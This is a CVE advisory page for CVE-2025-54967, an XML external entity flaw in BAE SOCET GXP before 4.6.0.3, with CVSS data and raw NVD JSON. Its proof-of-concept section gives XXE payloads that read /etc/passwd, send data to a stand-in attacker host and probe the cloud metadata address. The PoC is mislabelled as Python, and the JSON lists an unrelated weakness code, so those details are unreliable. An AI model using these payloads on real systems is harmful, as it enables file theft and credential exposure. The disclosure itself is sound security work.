Security Vulnerability Report
中文
CVE-2025-54967 CVSS 6.5 MEDIUM

CVE-2025-54967

Published: 2025-10-27 17:15:38
Last Modified: 2025-10-31 20:31:57

Description

An issue was discovered in BAE SOCET GXP before 4.6.0.3. It permits external entities in certain XML-based files. An attacker who is able to social engineer a SOCET GXP user into opening a malicious file can trigger a variety of outbound requests, potentially compromising sensitive information in the process.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:* - VULNERABLE
BAE SOCET GXP < 4.6.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-54967 PoC - XXE in BAE SOCET GXP --> <!-- This PoC demonstrates how to read local files via XXE --> <!DOCTYPE document [ <!ENTITY xxe_file SYSTEM "file:///etc/passwd"> <!ENTITY xxe_http SYSTEM "http://attacker-controlled-server.com/collect?data=XXE"> ]> <Document> <Metadata> <Title>Malicious XML Document</Title> <Description>&xxe_file;</Description> </Metadata> <Data>&xxe_http;</Data> </Document> <!-- Alternative PoC for SSRF --> <!DOCTYPE document [ <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/"> ]> <Document> <Content>&ssrf;</Content> </Document>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54967", "sourceIdentifier": "[email protected]", "published": "2025-10-27T17:15:38.337", "lastModified": "2025-10-31T20:31:57.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BAE SOCET GXP before 4.6.0.3. It permits external entities in certain XML-based files. An attacker who is able to social engineer a SOCET GXP user into opening a malicious file can trigger a variety of outbound requests, potentially compromising sensitive information in the process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.0.3", "matchCriteriaId": "952B8502-1EFC-4E40-AAB2-300744287FEB"}]}]}], "references": [{"url": "https://www.baesystems.com/en-us/product/geospatial-exploitation-products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.geospatialexploitationproducts.com/content/socet-gxp/vulnerabilities-disclosure/#cve-2025-54967", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}